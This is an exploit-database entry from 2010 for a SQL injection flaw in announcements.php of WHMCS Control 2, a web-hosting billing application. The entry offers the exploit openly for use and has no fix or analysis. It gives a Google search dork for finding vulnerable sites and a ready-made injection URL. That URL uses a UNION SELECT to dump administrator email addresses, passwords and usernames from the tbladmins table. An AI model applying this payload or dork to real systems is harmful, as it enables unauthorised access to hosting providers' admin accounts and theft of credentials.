WHMCS Control 2 (announcements.php) SQL Injection Vulnerabilities

2010-05-02T00:00:00
ID 1337DAY-ID-12106
Type zdt
Reporter Islam DefenDers
Modified 2010-05-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================================
WHMCS Control 2 (announcements.php) SQL Injection Vulnerabilities
=================================================================

Software: WHMCS control 2  Sql Injection            
                                                                          
Vulnerability: Remote Sql Injection                                     
Google Dork: Powered by WHMCompleteSolution - or "  inurl:WHMCS   or'     announcements.php  
Off. site: www.MiXaTy.com                                              
 
 
Author
Author: Islam DefenDers                           
Date: 2.5.2010                                  
Contact:  email: [email protected]            
 
 
Sql Injection
Exploit: http://site/announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--                                       
DOWNLOAD : http://www.whmcs.com/                                                                               
Greetz
IsLam DefenDers Mr.HaMaDa 



#  0day.today [2018-01-11]  #